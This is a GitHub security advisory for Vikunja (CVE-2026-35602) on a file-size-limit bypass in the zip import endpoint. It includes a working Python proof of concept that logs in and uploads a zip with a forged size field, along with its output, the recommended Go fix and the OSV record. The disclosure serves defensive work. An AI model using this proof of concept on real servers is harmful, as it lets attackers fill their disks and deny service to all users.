GHSA-QH78-RVG3-CV54
Vulnerability from GitHub – Published: 2026-04-10 15:35 – Updated: 2026-04-10 19:46

Summary
The Vikunja file import endpoint uses the attacker-controlled `Size` field from the JSON metadata inside the import zip instead of the actual decompressed file content length for the file size enforcement check. By setting `Size` to 0 in the JSON while including large compressed file entries in the zip, an attacker bypasses the configured maximum file size limit.
Details
During import, the JSON metadata from `data.json` inside the zip archive is deserialized into project structures. File content is read independently from the zip entries. When creating attachments, the code at `pkg/modules/migration/create_from_structure.go:406` passes the attacker-controlled `File.Size` from the JSON:
```go
err = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, a.File.Size, user)
```
The file size enforcement check at `pkg/files/files.go:118` then evaluates this attacker-controlled value:

```go
if realsize > config.GetMaxFileSizeInMBytes()*uint64(datasize.MB) && checkFileSizeLimit {
```
With `Size` set to 0 in the JSON, the comparison `0 > 20MB` evaluates to false and the check passes. The actual file content (from the zip entry) can be up to 500MB per entry (the `readZipEntry` limit). Highly compressible content like zero-filled buffers achieves extreme compression ratios, allowing a small zip upload to store gigabytes of data.
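The compression amplification is easy to verify locally. A minimal sketch using only Python's standard library (independent of the exploit itself) shows a zero-filled buffer deflating to a small fraction of its decompressed size:

```python
import io
import zipfile

# 25 MB of zeros -- maximally compressible content
raw = b"\x00" * (25 * 1024 * 1024)

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("large.bin", raw)

compressed = len(buf.getvalue())
ratio = len(raw) / compressed
print(f"{len(raw)} bytes -> {compressed} bytes ({ratio:.0f}:1)")
```

On typical zlib builds this yields a ratio on the order of 1000:1, which is why a kilobyte-scale upload can expand into megabytes of stored data.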
Proof of Concept
Tested on Vikunja v2.2.2 with default `max_file_size: 20MB`.
```python
import zipfile, io, json, requests

TARGET = "http://localhost:3456"
token = requests.post(f"{TARGET}/api/v1/login",
                      json={"username": "user1", "password": "User1pass!"}).json()["token"]
h = {"Authorization": f"Bearer {token}"}

# Craft zip with forged Size=0 in JSON but 25MB actual content
large_content = b"A" * (25 * 1024 * 1024)  # 25MB
data = [{"title": "Project", "tasks": [{"title": "Task", "attachments": [{
    "file": {"name": "large.bin", "size": 0, "created": "2026-01-01T00:00:00Z"},
    "created": "2026-01-01T00:00:00Z"}]}]}]

zip_buf = io.BytesIO()
with zipfile.ZipFile(zip_buf, 'w', zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("VERSION", "2.2.2")
    zf.writestr("data.json", json.dumps(data))
    zf.writestr("large.bin", large_content)

resp = requests.put(f"{TARGET}/api/v1/migration/vikunja-file/migrate",
                    headers=h,
                    files={"import": ("export.zip", zip_buf.getvalue(), "application/zip")})
```
Output:
```
HTTP 200: {"message": "Everything was migrated successfully."}
25MB file stored despite 20MB server limit.
```
Impact
An authenticated user can exhaust server storage by uploading small compressed zip files that decompress into files exceeding the configured maximum file size limit. A single ~25KB upload can store ~25MB due to zip compression ratios. Repeated exploitation can fill the server's disk, causing denial of service for all users. No per-user storage quota exists to contain the impact.
Recommended Fix
Use the actual content length instead of the attacker-controlled `Size` field:
```go
err = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, uint64(len(a.File.FileContent)), user)
```
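The difference between the vulnerable and fixed behavior can be modeled in a few lines of Python. This is an illustrative sketch, not Vikunja's actual Go code; the 20 MB limit mirrors the default `max_file_size` and `size_check_passes` stands in for the check in `pkg/files/files.go`:

```python
MAX_FILE_SIZE = 20 * 1024 * 1024  # default max_file_size: 20MB

def size_check_passes(claimed_size: int) -> bool:
    """Stand-in for the server-side limit check: reject files over the limit."""
    return not (claimed_size > MAX_FILE_SIZE)

file_content = b"A" * (25 * 1024 * 1024)  # 25MB of actual content

# Vulnerable behavior: trusts the attacker-controlled JSON "size" field.
assert size_check_passes(0)  # forged size 0 -> 0 > 20MB is false, check bypassed

# Fixed behavior: measures the decompressed content itself.
assert not size_check_passes(len(file_content))  # 25MB > 20MB -> rejected
```

The fix works because `len(a.File.FileContent)` is derived from the bytes actually read out of the zip entry, which the attacker cannot understate.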
*Found and reported by [aisafe.io](https://aisafe.io)*
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.2.2"
},
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35602"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T15:35:18Z",
"nvd_published_at": "2026-04-10T17:17:03Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe Vikunja file import endpoint uses the attacker-controlled `Size` field from the JSON metadata inside the import zip instead of the actual decompressed file content length for the file size enforcement check. By setting `Size` to 0 in the JSON while including large compressed file entries in the zip, an attacker bypasses the configured maximum file size limit.\n\n## Details\n\nDuring import, the JSON metadata from `data.json` inside the zip archive is deserialized into project structures. File content is read independently from the zip entries. When creating attachments, the code at `pkg/modules/migration/create_from_structure.go:406` passes the attacker-controlled `File.Size` from the JSON:\n\n```go\nerr = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, a.File.Size, user)\n```\n\nThe file size enforcement check at `pkg/files/files.go:118` then evaluates this attacker-controlled value:\n\n```go\nif realsize \u003e config.GetMaxFileSizeInMBytes()*uint64(datasize.MB) \u0026\u0026 checkFileSizeLimit {\n```\n\nWith `Size` set to 0 in the JSON, the comparison `0 \u003e 20MB` evaluates to false and the check passes. The actual file content (from the zip entry) can be up to 500MB per entry (the `readZipEntry` limit). Highly compressible content like zero-filled buffers achieves extreme compression ratios, allowing a small zip upload to store gigabytes of data.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2 with default `max_file_size: 20MB`.\n\n```python\nimport zipfile, io, json, requests\n\nTARGET = \"http://localhost:3456\"\ntoken = requests.post(f\"{TARGET}/api/v1/login\",\n json={\"username\": \"user1\", \"password\": \"User1pass!\"}).json()[\"token\"]\nh = {\"Authorization\": f\"Bearer {token}\"}\n\n# Craft zip with forged Size=0 in JSON but 25MB actual content\nlarge_content = b\"A\" * (25 * 1024 * 1024) # 25MB\ndata = [{\"title\": \"Project\", \"tasks\": [{\"title\": \"Task\", \"attachments\": [{\n \"file\": {\"name\": \"large.bin\", \"size\": 0, \"created\": \"2026-01-01T00:00:00Z\"},\n \"created\": \"2026-01-01T00:00:00Z\"}]}]}]\n\nzip_buf = io.BytesIO()\nwith zipfile.ZipFile(zip_buf, \u0027w\u0027, zipfile.ZIP_DEFLATED) as zf:\n zf.writestr(\"VERSION\", \"2.2.2\")\n zf.writestr(\"data.json\", json.dumps(data))\n zf.writestr(\"large.bin\", large_content)\n\nresp = requests.put(f\"{TARGET}/api/v1/migration/vikunja-file/migrate\",\n headers=h,\n files={\"import\": (\"export.zip\", zip_buf.getvalue(), \"application/zip\")})\n```\n\nOutput:\n```\nHTTP 200: {\"message\": \"Everything was migrated successfully.\"}\n25MB file stored despite 20MB server limit.\n```\n\n## Impact\n\nAn authenticated user can exhaust server storage by uploading small compressed zip files that decompress into files exceeding the configured maximum file size limit. A single ~25KB upload can store ~25MB due to zip compression ratios. Repeated exploitation can fill the server\u0027s disk, causing denial of service for all users. No per-user storage quota exists to contain the impact.\n\n## Recommended Fix\n\nUse the actual content length instead of the attacker-controlled `Size` field:\n\n```go\nerr = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, uint64(len(a.File.FileContent)), user)\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
"id": "GHSA-qh78-rvg3-cv54",
"modified": "2026-04-10T19:46:01Z",
"published": "2026-04-10T15:35:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-qh78-rvg3-cv54"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35602"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/pull/2575"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Vikunja has File Size Limit Bypass via Vikunja Import"
}